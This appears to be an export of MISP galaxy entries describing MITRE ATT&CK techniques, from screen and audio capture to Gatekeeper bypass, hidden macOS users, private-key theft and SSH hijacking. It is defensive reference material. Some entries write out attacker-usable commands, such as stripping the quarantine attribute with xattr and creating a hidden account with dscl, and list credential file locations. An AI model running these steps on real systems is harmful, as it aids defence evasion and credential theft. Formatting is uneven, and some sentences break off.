The tag is: <code>misp-galaxy:mitre-attack-pattern="Authentication Package - T1131"</code>

Authentication Package - T1131 has relationships with:


Screen Capture - T1113

Adversaries may attempt to take screen captures of the desktop to gather information over the
course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as <code>CopyFromScreen</code>, <code>xwd</code>, or <code>screencapture</code>.(Citation: CopyFromScreen .NET)(Citation: Antiquated Mac Malware)

The tag is: <code>misp-galaxy:mitre-attack-pattern="Screen Capture - T1113"</code>

### Dynamic DNS - T1311

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1311).

Dynamic DNS is a method of automatically updating a name in the DNS system. Providers offer this rapid reconfiguration of IPs to hostnames as a service. (Citation: DellMirage2012)

The tag is: <code>misp-galaxy:mitre-attack-pattern="Dynamic DNS - T1311"</code>

Dynamic DNS - T1311 has relationships with:

- related-to: <code>misp-galaxy:mitre-attack-pattern="Dynamic DNS - T1333" with estimative-language:likelihood-probability="almost-certain"</code>

### Email Collection - T1114

Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.

The tag is: <code>misp-galaxy:mitre-attack-pattern="Email Collection - T1114"</code>

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**Input Prompt - T1411**

The operating system and installed applications often have legitimate needs to prompt the user for sensitive information such as account credentials, bank account information, or Personally Identifiable Information (PII). Adversaries may mimic this functionality to prompt users for sensitive information.

Compared to traditional PCs, the constrained display size of mobile devices may impair the ability to provide users with contextual information, making users more susceptible to this technique's use.(Citation: Felt-PhishingOnMobileDevices)

Specific approaches to this technique include:

**Impersonate the identity of a legitimate application**

A malicious application could impersonate the identity of a legitimate application (e.g. use the same application name and/or icon) and get installed on the device. The malicious app could then prompt the user for sensitive information.(Citation: eset-finance)

**Display a prompt on top of a running legitimate application**

A malicious application could display a prompt on top of a running legitimate application to trick users into entering sensitive information into the malicious application rather than the legitimate application. Typically, the malicious application would need to know when the targeted application (and individual activity within the targeted application) is running in the foreground, so that the malicious application knows when to display its prompt. Android 5.0 and 5.1.1, respectively, increased the difficulty of determining the current foreground application through modifications to the `ActivityManager` API.(Citation: Android-getRunningTasks)(Citation: StackOverflow-getRunningAppProcesses). A malicious application can still abuse Android's accessibility features to determine which application is currently in the foreground.(Citation: ThreatFabric Cerberus)

Approaches to display a prompt include:

- A malicious application could start a new activity on top of a running legitimate application.(Citation: Felt-PhishingOnMobileDevices)(Citation: Hassell-ExploitingAndroid) Android 10 places new restrictions on the ability for an application to start a new activity on top of another application, which may make it more difficult for adversaries to utilize this technique.(Citation: Android Background)

- A malicious application could create an application overlay window on top of a running legitimate application. Applications must hold the `SYSTEM_ALERT_WINDOW` permission to create overlay windows. This permission is handled differently than typical Android permissions, and at least under certain conditions is automatically granted to applications installed from the
Google Play Store.(Citation: Cloak and Dagger)(Citation: NowSecure Android Overlay)(Citation: Skycure-Accessibility) The `SYSTEM_ALERT_WINDOW` permission and its associated ability to create application overlay windows are expected to be deprecated in a future release of Android in favor of a new API.(Citation: XDA Bubbles)

**Fake device notifications**

A malicious application could send fake device notifications to the user. Clicking on the device notification could trigger the malicious application to display an input prompt.(Citation: Group IB Gustuff Mar 2019)

The tag is: `misp-galaxy:mitre-attack-pattern="Input Prompt - T1411"

Table 3698. Table References

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**Input Prompt - T1141**

When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1088)).

Adversaries may mimic this functionality to prompt users for credentials with a seemingly
legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.(Citation: OSX Malware Exploits MacKeeper) This type of prompt can be used to collect credentials via various languages such as [AppleScript](https://attack.mitre.org/techniques/T1155)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware) and [PowerShell](https://attack.mitre.org/techniques/T1086)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015).

The tag is: misp-galaxy:mitre-attack-pattern="Input Prompt - T1141"

Input Prompt - T1141 has relationships with:


Table 3699. Table References

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**Clipboard Data - T1115**

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

In Windows, Applications can access clipboard data by using the Windows API.(Citation: MSDN Clipboard) OSX provides a native command, `<code>pbpaste</code>`, to grab clipboard contents.(Citation: Operating with EmPyre)

The tag is: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115"

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**LC_LOAD_DYLIB Addition - T1161**

Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long adjustments are made to the rest of the fields and dependencies (Citation: Writing Bad Malware for OSX). There are tools available to perform these changes. Any changes will invalidate digital signatures on binaries because the binary is being modified. Adversaries can remediate this issue by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time (Citation: Malware Persistence on OS X).

The tag is: *misp-galaxy:mitre-attack-pattern="LC_LOAD_DYLIB Addition - T1161"*

LC_LOAD_DYLIB Addition - T1161 has relationships with:


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**Code Signing - T1116**

Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) However, adversaries are known to use code signing certificates to masquerade malware and tools as legitimate binaries (Citation: Janicab). The certificates used during an operation may be created, forged, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates)

Code signing to verify software on first run can be used on modern Windows and macOS/OS X systems. It is not used on Linux due to the decentralized nature of the platform. (Citation: Wikipedia Code Signing)

Code signing certificates may be used to bypass security policies that require signed code to execute on a system.

The tag is: *misp-galaxy:mitre-attack-pattern="Code Signing - T1116"*

Code Signing - T1116 has relationships with:


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### Table 3702. Table References
Automated Collection - T1119

Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. This functionality could also be built into remote access tools.

This technique may incorporate use of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) and [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) to identify and move files.

The tag is: `misp-galaxy:mitre-attack-pattern="Automated Collection - T1119"`

Template Injection - T1221

Adversaries may create or modify references in Office document templates to conceal malicious code or force authentication attempts. Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, .xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives comprised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered. (Citation: Microsoft Open XML July 2017)

Properties within parts may reference shared public resources accessed via online URLs. For example, template properties reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded.

Adversaries may abuse this technology to initially conceal malicious code to be executed via documents. Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded. (Citation: SANS Brian Wiltse Template Injection) These documents can be delivered via other techniques such as [Phishing](https://attack.mitre.org/techniques/T1566) and/or [Taint Shared Content](https://attack.mitre.org/techniques/T1080) and may evade static detections since no typical...
indicators (VBA macro, script, etc.) are present until after the malicious payload is fetched. (Citation: Redxorblue Remote Template Injection) Examples have been seen in the wild where template injection was used to load malicious code containing an exploit. (Citation: MalwareBytes Template Injection OCT 2017)

This technique may also enable [Forced Authentication](https://attack.mitre.org/techniques/T1187) by injecting a SMB/HTTPS (or other credential prompting) URL and triggering an authentication attempt. (Citation: Anomali Template Injection MAR 2018) (Citation: Talos Template Injection July 2017) (Citation: ryhanson phishery SEPT 2016)

The tag is: `misp-galaxy:mitre-attack-pattern="Template Injection - T1221"

### Audio Capture - T1123

An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.

Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later.

The tag is: `misp-galaxy:mitre-attack-pattern="Audio Capture - T1123"

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Data Encoding - T1132

Adversaries may encode data to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system. Use of data encoding may adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, or other binary-to-text and character encoding systems. (Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.

The tag is: misp-galaxy:mitre-attack-pattern="Data Encoding - T1132"

Table 3706. Table References

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<td><a href="https://attack.mitre.org/techniques/T1132">https://attack.mitre.org/techniques/T1132</a></td>
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<td><a href="https://en.wikipedia.org/wiki/Binary-to-text_encoding">https://en.wikipedia.org/wiki/Binary-to-text_encoding</a></td>
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<tr>
<td><a href="https://en.wikipedia.org/wiki/Character_encoding">https://en.wikipedia.org/wiki/Character_encoding</a></td>
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Capture Camera - T1512

Adversaries may utilize the camera to capture information about the user, their surroundings, or other physical identifiers. Adversaries may use the physical camera devices on a mobile device to capture images or video. By default, in Android and iOS, an application must request permission to access a camera device which is granted by the user through a request prompt. In Android, applications must hold the \texttt{android.permission.CAMERA} permission to access the camera. In iOS, applications must include the \texttt{NSCameraUsageDescription} key in the \texttt{Info.plist} file, and must request access to the camera at runtime.

The tag is: misp-galaxy:mitre-attack-pattern="Capture Camera - T1512"

Table 3707. Table References

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<td><a href="https://attack.mitre.org/techniques/T1512">https://attack.mitre.org/techniques/T1512</a></td>
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Video Capture - T1125

An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.

Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture video or images. Video or image files may be
written to disk and exfiltrated later. This technique differs from [Screen Capture](https://attack.mitre.org/techniques/T1113) due to use of specific devices or applications for video recording rather than capturing the victim’s screen.

In macOS, there are a few different malware samples that record the user’s webcam such as FruitFly and Proton. (Citation: objective-see 2017 review)

The tag is: *misp-galaxy:mitre-attack-pattern=*"Video Capture - T1125"

**Table 3708. Table References**

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<td><a href="https://objective-see.com/blog/blog_0x25.html">https://objective-see.com/blog/blog_0x25.html</a></td>
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**Login Item - T1162**

MacOS provides the option to list specific applications to run when a user logs in. These applications run under the logged in user’s context, and will be started every time the user logs in. Login items installed using the Service Management Framework are not visible in the System Preferences and can only be removed by the application that created them (Citation: Adding Login Items). Users have direct control over login items installed using a shared file list which are also visible in System Preferences (Citation: Adding Login Items). These login items are stored in the user’s `<code>~/Library/Preferences/</code>` directory in a plist file called `<code>com.apple.loginitems.plist</code>` (Citation: Methods of Mac Malware Persistence). Some of these applications can open visible dialogs to the user, but they don’t all have to since there is an option to ‘Hide’ the window. If an adversary can register their own login item or modified an existing one, then they can use it to execute their code for a persistence mechanism each time the user logs in (Citation: Malware Persistence on OS X) (Citation: OSX.Dok Malware). The API method `<code>SMLoginItemSetEnabled</code>` can be used to set Login Items, but scripting languages like [AppleScript](https://attack.mitre.org/techniques/T1155) can do this as well (Citation: Adding Login Items).

The tag is: *misp-galaxy:mitre-attack-pattern=*"Login Item - T1162"

Login Item - T1162 has relationships with:

- revoked-by: *misp-galaxy:mitre-attack-pattern=*"Plist Modification - T1547.011" with estimative-language:likelihood-probability="almost-certain"

**Table 3709. Table References**

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<td><a href="https://capec.mitre.org/data/definitions/564.html">https://capec.mitre.org/data/definitions/564.html</a></td>
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Domain Fronting - T1172

Domain fronting takes advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS. (Citation: Fifield Blocking Resistant Communication through domain fronting 2015) The technique involves using different domain names in the SNI field of the TLS header and the Host field of the HTTP header. If both domains are served from the same CDN, then the CDN may route to the address specified in the HTTP header after unwrapping the TLS header. A variation of the the technique, “domainless” fronting, utilizes a SNI field that is left blank; this may allow the fronting to work even when the CDN attempts to validate that the SNI and HTTP Host fields match (if the blank SNI fields are ignored).

For example, if domain-x and domain-y are customers of the same CDN, it is possible to place domain-x in the TLS header and domain-y in the HTTP header. Traffic will appear to be going to domain-x, however the CDN may route it to domain-y.

The tag is: misp-galaxy:mitre-attack-pattern="Domain Fronting - T1172"

Domain Fronting - T1172 has relationships with:

- revoked-by: misp-galaxy:mitre-attack-pattern="Domain Fronting - T1090.004" with estimative-language:likelihood-probability="almost-certain"

Table 3710. Table References

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AppCert DLLs - T1182

Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs Registry key under <code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager</code> are loaded into every process that calls the ubiquitously used application programming interface (API) functions CreateProcess, CreateProcessAsUser, CreateProcessWithLoginW, CreateProcessWithTokenW, or WinExec. (Citation: Endgame Process Injection July 2017)

Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), this value can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.
The tag is: misp-galaxy:mitre-attack-pattern="AppCert DLLs - T1182"

AppCert DLLs - T1182 has relationships with:

- revoked-by: misp-galaxy:mitre-attack-pattern="AppCert DLLs - T1546.009" with estimative-language:likelihood-probability="almost-certain"

Table 3711. Table References

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<td><a href="https://forum.sysinternals.com/appcertdlls_topic12546.html">https://forum.sysinternals.com/appcertdlls_topic12546.html</a></td>
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**Spearphishing Link - T1192**

Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments.

All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly or verify the receipt of an email (i.e. web bugs/web beacons). Links may also direct users to malicious applications designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528), like OAuth tokens, in order to gain access to protected applications and information.(Citation: Trend Micro Pawn Storm OAuth 2017)

The tag is: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1192"

Spearphishing Link - T1192 has relationships with:


Table 3712. Table References

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<td><a href="https://capec.mitre.org/data/definitions/163.html">https://capec.mitre.org/data/definitions/163.html</a></td>
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1664
Shared Modules - T1129

Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows [Native API](https://attack.mitre.org/techniques/T1106) which is called from functions like <code>CreateProcess</code>, <code>LoadLibrary</code>, etc. of the Win32 API. (Citation: Wikipedia Windows Library Files)

The module loader can load DLLs:

- via specification of the (fully-qualified or relative) DLL pathname in the IMPORT directory;
- via EXPORT forwarded to another DLL, specified with (fully-qualified or relative) pathname (but without extension);
- via an NTFS junction or symlink program.exe.local with the fully-qualified or relative pathname of a directory containing the DLLs specified in the IMPORT directory or forwarded EXPORTs;
- via <code><file name="filename.extension" loadFrom="fully-qualified or relative pathname"></file></code> in an embedded or external "application manifest". The file name refers to an entry in the IMPORT directory or a forwarded EXPORT.

Adversaries may use this functionality as a way to execute arbitrary code on a victim system. For example, malware may execute share modules to load additional components or features.

The tag is: misp-galaxy:mitre-attack-pattern="Shared Modules - T1129"

Table 3713. Table References

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<td><a href="https://en.wikipedia.org/wiki/Microsoft_Windows_library_files">https://en.wikipedia.org/wiki/Microsoft_Windows_library_files</a></td>
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Obfuscate infrastructure - T1331

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1331).

Obfuscation is hiding the day-to-day building and testing of new tools, chat servers, etc. (Citation: FireEyeAPT17)

The tag is: misp-galaxy:mitre-attack-pattern="Obfuscate infrastructure - T1331"

Obfuscate infrastructure - T1331 has relationships with:
Hidden Window - T1143

Adversaries may implement hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks. Adversaries may abuse operating system functionality to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.

Windows

There are a variety of features in scripting languages in Windows, such as [PowerShell](https://attack.mitre.org/techniques/T1086), Jscript, and VBScript to make windows hidden. One example of this is `<code>powershell.exe -WindowStyle Hidden</code>`. (Citation: PowerShell About 2019)

Mac

The configurations for how applications run on macOS are listed in property list (plist) files. One of the tags in these files can be `<code>apple.awt.UIElement</code>`, which allows for Java applications to prevent the application’s icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don’t also want to show up in the Dock. However, adversaries can abuse this feature and hide their running window. (Citation: Antiquated Mac Malware)

The tag is: `misp-galaxy:mitre-attack-pattern="Hidden Window - T1143"

Hidden Window - T1143 has relationships with:

- revoked-by: `misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003"` with estimative-language:likelihood-probability="almost-certain"

Table 3715. Table References

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<td><a href="https://attack.mitre.org/techniques/T1143">https://attack.mitre.org/techniques/T1143</a></td>
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</table>
Screen Capture - T1513

Adversaries may use screen captures to collect information about applications running in the foreground, capture user data, credentials, or other sensitive information. Applications running in the background can capture screenshots or videos of another application running in the foreground by using the Android `MediaProjectionManager` (generally requires the device user to grant consent). (Citation: Fortinet screencap July 2019) (Citation: Android ScreenCap1 2019) Background applications can also use Android accessibility services to capture screen contents being displayed by a foreground application. (Citation: Lookout-Monokle) An adversary with root access or Android Debug Bridge (adb) access could call the Android `screencap` or `screenrecord` commands. (Citation: Android ScreenCap2 2019) (Citation: Trend Micro ScreenCap July 2015)

The tag is: `misp-galaxy:mitre-attack-pattern="Screen Capture - T1513"`

Table 3716. Table References

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<td><a href="https://developer.android.com/studio/command-line/adb">https://developer.android.com/studio/command-line/adb</a></td>
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Create Account - T1136

Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.

Accounts may be created on the local system or within a domain or cloud tenant. In cloud environments, adversaries may create accounts that only have access to specific services, which can reduce the chance of detection.

The tag is: `misp-galaxy:mitre-attack-pattern="Create Account - T1136"`

Table 3717. Table References

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1667
Application Shimming - T1138

The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. (Citation: Endgame Process Injection July 2017) Within the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses [Hooking](https://attack.mitre.org/techniques/T1179) to redirect the code as necessary in order to communicate with the OS.

A list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:

- `<code>%WINDIR%\AppPatch\sysmain.sdb</code>`
- `<code>hklm\software\microsoft\windows nt\currentversion\appcompatflags\installedsdb</code>`

Custom databases are stored in:

- `<code>%WINDIR%\AppPatch\custom & %WINDIR%\AppPatch\AppPatch64\Custom</code>`
- `<code>hklm\software\microsoft\windows nt\currentversion\appcompatflags\custom</code>`

To keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to [Bypass User Account Control](https://attack.mitre.org/techniques/T1088) (UAC) (RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress). Similar to [Hooking](https://attack.mitre.org/techniques/T1179), utilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc.

The tag is: `misp-galaxy:mitre-attack-pattern="Application Shimming - T1138"`

Application Shimming - T1138 has relationships with:


Table 3718. Table References

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</table>
Authentication attempt - T1381

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

Attempt to use default vendor credentials, brute force credentials, or previously obtained legitimate credentials to authenticate remotely. This access could be to a web portal, through a VPN, or in a phone app. (Citation: Remote Access Healthcare) (Citation: RDP Point of Sale)

The tag is: misp-galaxy:mitre-attack-pattern="Authentication attempt - T1381"

Table 3719. Table References

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Spearphishing Attachment - T1193

Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution.

There are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.

The tag is: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1193"

Spearphishing Attachment - T1193 has relationships with:


Table 3720. Table References

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**Bash History - T1139**

Bash keeps track of the commands users type on the command-line with the "history" utility. Once a user logs out, the history is flushed to the user's `.bash_history` file. For each user, this file resides at the same location: `<code>~/bash_history</code>`. Typically, this file keeps track of the user's last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Attackers can abuse this by looking through the file for potential credentials. (Citation: External to DA, the OS X Way)

The tag is: `misp-galaxy:mitre-attack-pattern="Bash History - T1139"

Bash History - T1139 has relationships with:

- revoked-by: `misp-galaxy:mitre-attack-pattern="Bash History - T1552.003"` with estimative-language:likelihood-probability="almost-certain"

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**Gatekeeper Bypass - T1144**

In macOS and OS X, when applications or programs are downloaded from the internet, there is a special attribute set on the file called `<code>com.apple.quarantine</code>`. This attribute is read by Apple's Gatekeeper defense program at execution time and provides a prompt to the user to allow or deny execution.

Apps loaded onto the system from USB flash drive, optical disk, external hard drive, or even from a drive shared over the local network won't set this flag. Additionally, other utilities or events like drive-by downloads don't necessarily set it either. This completely bypasses the built-in Gatekeeper check. (Citation: Methods of Mac Malware Persistence) The presence of the quarantine flag can be checked by the `xattr` command `<code>xattr /path/to/MyApp.app</code>` for `<code>com.apple.quarantine</code>`. Similarly, given sudo access or elevated permission, this attribute can be removed with `xattr` as well, `<code>sudo xattr -r -d com.apple.quarantine /path/to/MyApp.app</code>`. (Citation: Clearing quarantine attribute) (Citation: OceanLotus for OS X)

In typical operation, a file will be downloaded from the internet and given a quarantine flag before being saved to disk. When the user tries to open the file or application, macOS's gatekeeper will step in and check for the presence of this flag. If it exists, then macOS will then prompt the user to confirmation that they want to run the program and will even provide the URL where the application came from. However, this is all based on the file being downloaded from a quarantine-savvy application. (Citation: Bypassing Gatekeeper)

The tag is: `misp-galaxy:mitre-attack-pattern="Gatekeeper Bypass - T1144"

Gatekeeper Bypass - T1144 has relationships with:
Table 3722. Table References

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**Foreground Persistence - T1541**

Adversaries may abuse Android's `startForeground()` API method to maintain continuous sensor access. Beginning in Android 9, idle applications running in the background no longer have access to device sensors, such as the camera, microphone, and gyroscope. (Citation: Android-SensorsOverview) Applications can retain sensor access by running in the foreground, using Android's `startForeground()` API method. This informs the system that the user is actively interacting with the application, and it should not be killed. The only requirement to start a foreground service is showing a persistent notification to the user. (Citation: Android-ForegroundServices)

Malicious applications may abuse the `startForeground()` API method to continue running in the foreground, while presenting a notification to the user pretending to be a genuine application. This would allow unhindered access to the device's sensors, assuming permission has been previously granted. (Citation: BlackHat Sutter Android Foreground 2019)

Malicious applications may also abuse the `startForeground()` API to inform the Android system that the user is actively interacting with the application, thus preventing it from being killed by the low memory killer. (Citation: TrendMicro-Yellow Camera)

The tag is: `misp-galaxy:mitre-attack-pattern="Foreground Persistence - T1541"`

Table 3723. Table References

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</table>
Private Keys - T1145

Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures. (Citation: Wikipedia Public Key Crypto)

Adversaries may gather private keys from compromised systems for use in authenticating to [Remote Services](https://attack.mitre.org/techniques/T1021) like SSH or for use in decrypting other collected files such as email. Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk, .p12, .pem, .pfx, .cer, .p7b, .asc. Adversaries may also look in common key directories, such as <code>~/.ssh</code> for SSH keys on * nix-based systems or <code>C:\Users\(username)\.ssh\</code> on Windows.

Private keys should require a password or passphrase for operation, so an adversary may also use [Input Capture](https://attack.mitre.org/techniques/T1056) for keylogging or attempt to [Brute Force](https://attack.mitre.org/techniques/T1110) the passphrase off-line.

Adversary tools have been discovered that search compromised systems for file extensions relating to cryptographic keys and certificates. (Citation: Kaspersky Careto) (Citation: Palo Alto Prince of Persia)

The tag is: <em>misp-galaxy:mitre-attack-pattern="Private Keys - T1145"</em>

Private Keys - T1145 has relationships with:

- revoked-by: misp-galaxy:mitre-attack-pattern="Private Keys - T1552.004" with estimative-language:likelihood-probability="almost-certain"

Table 3724. Table References

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<td><a href="https://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/">https://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/</a></td>
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Lockscreen Bypass - T1461

An adversary with physical access to a mobile device may seek to bypass the device's lockscreen.

Biometric Spoofing

If biometric authentication is used, an adversary could attempt to spoof a mobile device's biometric authentication mechanism. (Citation: SRLabs-Fingerprint) (Citation: SecureIDNews-Spoof)
TheSun-FaceID).

iOS partly mitigates this attack by requiring the device passcode rather than a fingerprint to unlock the device after every device restart and after 48 hours since the device was last unlocked (Citation: Apple-TouchID). Android has similar mitigations.

**Device Unlock Code Guessing or Brute Force**

An adversary could attempt to brute-force or otherwise guess the lockscreen passcode (typically a PIN or password), including physically observing ("shoulder surfing") the device owner's use of the lockscreen passcode.

**Exploit Other Device Lockscreen Vulnerabilities**

Techniques have periodically been demonstrated that exploit vulnerabilities on Android (Citation: Wired-AndroidBypass), iOS (Citation: Kaspersky-iOSBypass), or other mobile devices to bypass the device lockscreen. The vulnerabilities are generally patched by the device/operating system vendor once they become aware of their existence.

The tag is: *misp-galaxy:mitre-attack-pattern="Lockscreen Bypass - T1461"

*Table 3725. Table References*

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**URI Hijacking - T1416**

Adversaries may register Uniform Resource Identifiers (URIs) to intercept sensitive data.

Applications regularly register URIs with the operating system to act as a response handler for various actions, such as logging into an app using an external account via single sign-on. This allows redirections to that specific URI to be intercepted by the application. If a malicious application were to register for a URI that was already in use by a genuine application, the malicious application may be able to intercept data intended for the genuine application or perform a phishing attack against the genuine application. Intercepted data may include OAuth authorization codes or tokens that could be used by the malicious application to gain access to
The tag is: misp-galaxy:mitre-attack-pattern="URI Hijacking - T1416"

Input Capture - T1417

Adversaries may capture user input to obtain credentials or other information from the user through various methods.

Malware may masquerade as a legitimate third-party keyboard to record user keystrokes. On both Android and iOS, users must explicitly authorize the use of third-party keyboard apps. Users should be advised to use extreme caution before granting this authorization when it is requested.

On Android, malware may abuse accessibility features to record keystrokes by registering an AccessibilityService class, overriding the onAccessibilityEvent method, and listening for the AccessibilityEvent.TYPE_VIEW_TEXT_CHANGED event type. The event object passed into the function will contain the data that the user typed.

Additional methods of keylogging may be possible if root access is available.

The tag is: misp-galaxy:mitre-attack-pattern="Input Capture - T1417"

Hidden Users - T1147

Every user account in macOS has a userID associated with it. When creating a user, you can specify the userID for that account. There is a property value in <code>/Library/Preferences/com.apple.loginwindow</code> called <code>Hide500Users</code> that prevents users with userIDs 500 and lower from appearing at the login screen. By using the [Create Account](https://attack.mitre.org/techniques/T1136) technique with a userID under 500 and enabling this property (setting it to Yes), an adversary can hide their user accounts much more easily: <code>sudo dscl . -create /Users/username UniqueID 401</code> (Citation: Cybereason OSX Pirrit).
The tag is: `misp-galaxy:mitre-attack-pattern="Hidden Users - T1147"`

Hidden Users - T1147 has relationships with:


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**Application Discovery - T1418**

Adversaries may seek to identify all applications installed on the device. One use case for doing so is to identify the presence of endpoint security applications that may increase the adversary's risk of detection. Another use case is to identify the presence of applications that the adversary may wish to target.

On Android, applications can use methods in the PackageManager class (Citation: Android-PackageManager) to enumerate other apps installed on device, or an entity with shell access can use the pm command line tool.

On iOS, apps can use private API calls to obtain a list of other apps installed on the device. (Citation: Kurtz-MaliciousiOSApps) However, use of private API calls will likely prevent the application from being distributed through Apple's App Store.

The tag is: `misp-galaxy:mitre-attack-pattern="Application Discovery - T1418"`

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<td><a href="https://andreas-kurtz.de/2014/09/malicious-ios-apps/">https://andreas-kurtz.de/2014/09/malicious-ios-apps/</a></td>
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**SSH Hijacking - T1184**

Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.

In order to move laterally from a compromised host, adversaries may take advantage of trust relationships established with other systems via public key authentication in active SSH sessions by hijacking an existing connection to another system. This may occur through compromising the SSH agent itself or by having access to the agent's socket. If an adversary is able to obtain root access, then hijacking SSH sessions is likely trivial. (Citation: Slideshare Abusing SSH) (Citation: SSHjack
